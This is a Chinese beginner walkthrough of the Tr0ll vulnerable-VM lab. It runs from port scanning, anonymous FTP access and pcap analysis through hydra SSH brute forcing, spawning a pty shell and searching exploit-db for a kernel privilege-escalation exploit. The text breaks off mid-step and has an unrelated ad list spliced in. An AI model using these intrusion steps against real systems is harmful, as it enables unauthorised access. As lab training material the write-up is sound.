前言
本次采用Tr0ll经典项目作为靶场,模拟互联网环境,演示从信息收集到最后提权的全过程。本次实验所涉及到的技术有端口扫描、流量分析、文件分析、hydra爆破、各种反弹shell、稳定shell、计划任务反弹shell(提权),公私钥互碰等一系列基本操作,适合入门不久的初学者练习。
攻击机:...3
受害机:...7
一、信息收集
1、全端口扫描
nmap-p-...7
发现开放21、22、80端口
2、nmap详细扫描
nmap-sS-sV-A-T5...7
发现ftp存在默认密码Anonymous
3、登入ftp
使用默认账号密码Anonymous/Anonymous登入ftp
ftp...7dir查看get下载put上传
发现存在lol.pcap流量包
1、网络安全学习路线2、电子书籍(白帽子)3、安全大厂内部视频4、份src文档5、常见安全面试题6、ctf大赛经典题目解析7、全套工具包8、应急响应笔记
4、分析流量包
使用wireshark分析流量
wiresharklol.pcap
右键追踪tcp流
得到信息secret_stuff.txt
追踪第二条tcp流,得到信息sup3rs3cr3tdirlol
经过排查sup3rs3cr3tdirlol是个目录,里面有个roflmao文件
5、分析文件
下载该文件,分析后发现是个32位文件
fileroflmao
分析文件信息
exiftoolroflmaobinwalkroflmaostringsroflmao
得到信息:0xBF
发现0xBF目录存在信息,将信息做成密码本zhi.txt
Pass.txt里面没啥东西,文件名可能有用
二、暴力破解
1、hydra爆破
使用hydra爆破,将刚才收集的作为账号本,文件名Pass.txt做为密码字段进行ssh爆破
hydra-Lzhi.txt-pPass.txt...7ssh
得到账号密码:overflow、Pass.txt
2、登入ssh
sshoverflow
...7稳定shellpython-cimportpty;pty.spawn("/bin/bash")三、提权
1、查看系统版本
uname-a
发现是Linuxubuntu3.13.0
2、搜索提权exp
searchsploitLinuxubuntu3.13.0复制到桌面cp/usr/share/exploitdb/exploits/linux/local/.c/root/Desktop/
3、查看exp
gedit.c
exp里有使用教程
python开启